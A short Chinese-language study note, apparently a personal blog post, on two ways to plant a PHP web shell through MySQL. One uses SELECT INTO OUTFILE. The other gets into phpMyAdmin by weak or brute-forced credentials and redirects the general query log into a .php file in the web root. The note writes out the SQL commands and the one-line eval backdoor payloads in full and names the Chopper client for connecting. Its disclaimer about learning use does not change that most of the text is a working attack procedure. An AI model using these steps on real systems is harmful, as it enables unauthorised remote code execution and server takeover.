(本文仅为平时学习记录,若有错误请大佬指出,如果本文能帮到你那我也是很开心啦)
该文章参考https://www.jianshu.com/p/ddd41b841c36很详细,感谢!!!本文仅为了学习交流,严禁非法使用!!!
一、使用into outfile写入一句话木马
(注:使用这个方法需要知道网站的绝对路径,可以通过报错获取路径、通过phpinfo.php等等,然后写一句话木马到源码的存放位置中)
1.查看全局变量中的安全文件优先级,如果该参数设置为空或指定的文件夹才可利用
show global variables like ‘%secure-file-prie%’;
- 当secure_file_priv的值为NULL时,表示限制MySQL不允许导入导出,要想使得木马写入成功,则需要在mysql文件夹下修改my.ini 文件在[mysqld]内加入secure_file_priv =""
select “<?php @eval($_POST[w]);?>” into outfile “/var/www/html/muma.php”
二、利用PHPMyAdmin日志文件Getshell
常见的日志文件分为:业务(常见服务)日志和系统(Windows或Linux)日志
(注:MySQL 版本>5.0会创建日志文件,日志文件是全局遍历,并可读写)
- 通过弱口令或爆破的方式登录PHPMyAdmin,执行SQL语句
select @@datadir; 查看数据存放位置
- 猜测源码的存放位置,D:\phpstudy_pro\www
- 查看日志状态
show variables like '%general%';
- 开启日志记录功能,并修改记录的路径和文件名
set global general_log='on';
set global general_log_file='F:\\phpStudy_64\\phpstudy_pro\\www\\log.php'
- 查看日志状态
show variables like '%general%';
- 在该文件中写木马
select "<?php eval($_POST[k]);?>"
- 打开log.php文件,发现木马已被写入
-
浏览器访问,并设置k值,可以看到PHP信息,GetShell成功
- 也可使用菜刀GetShell
